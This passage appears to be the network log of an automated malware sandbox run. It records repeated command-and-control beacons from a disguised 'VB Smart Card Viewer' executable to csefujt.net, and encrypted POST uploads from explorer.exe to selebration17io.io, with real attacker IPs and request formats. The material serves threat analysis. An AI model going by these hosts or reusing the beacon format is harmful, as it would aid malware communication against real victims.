52 | 192.168.2.6 | 49790 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:01.671211958 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:01.910502911 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.6 | 49792 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:02.267677069 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:02.513107061 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.6 | 49793 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:02.393600941 CET | 284 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://odpbiknexhwa.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 274
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:14:02.393649101 CET | 274 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 80 d8 3c ac
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO<~6Yq8CdIVLsG.W<O67K :D|5WF/JeYRl'[Z^5v3;w`?$<HS:$k ?}[2omf)
Feb 5, 2024 12:14:02.651201010 CET | 194 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.6 | 49795 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:02.858400106 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:03.099977970 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
Feb 5, 2024 12:14:03.100120068 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.6 | 49797 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:03.654192924 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:03.898150921 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:03 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.6 | 49798 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:03.764831066 CET | 288 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://vjnsqchgwnudstfw.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 346
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:14:03.764831066 CET | 346 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9a c3 55 cb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bOU;r\sEDD+q2^wR|%y}P*x(0at;0qeDnr=;"0KP3]IYgep6:}qvB
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:04.015431881 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:03 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.6 | 49799 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:04.254204988 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:04.500132084 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.6 | 49800 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:04.847948074 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:05.084335089 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Feb 5, 2024 12:14:05.206486940 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:05.451948881 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Feb 5, 2024 12:14:05.575567961 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:05.812444925 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.6 | 49802 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:06.190956116 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:06.432602882 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.6 | 49803 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:06.779546976 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:07.016380072 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.6 | 49804 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:07.354234934 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:07.601557016 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
Feb 5, 2024 12:14:07.721625090 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:07.958781004 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.6 | 49805 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:08.042891979 CET | 284 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://hcpsryfdfswb.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 279
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:14:08.042928934 CET | 279 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8b ff 1c ab
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bOac,n:{62O>1cQDI{mk|3wx!< W%fLnAu/mzu0:IAqS?|drkR_s
Feb 5, 2024 12:14:08.294682026 CET | 194 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.6 | 49806 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:08.300482988 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:08.545871019 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.6 | 49807 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:08.895256042 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:09.137732983 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.6 | 49808 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:09.488209963 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:09.724878073 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Feb 5, 2024 12:14:09.845014095 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:10.082019091 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.6 | 49809 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:09.708600044 CET | 287 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jojqjqewwnyplbq.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 196
Host: selebration17io.io
Feb 5, 2024 12:14:09.708636045 CET | 196 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9b c8 0e d7
Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bOi'zP&S.>_ayx~+sl~=ynVXJ[^^:(EFct2[ag
Feb 5, 2024 12:14:09.966373920 CET | 194 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 05 Feb 2024 11:14:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.6 | 49810 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:10.501539946 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
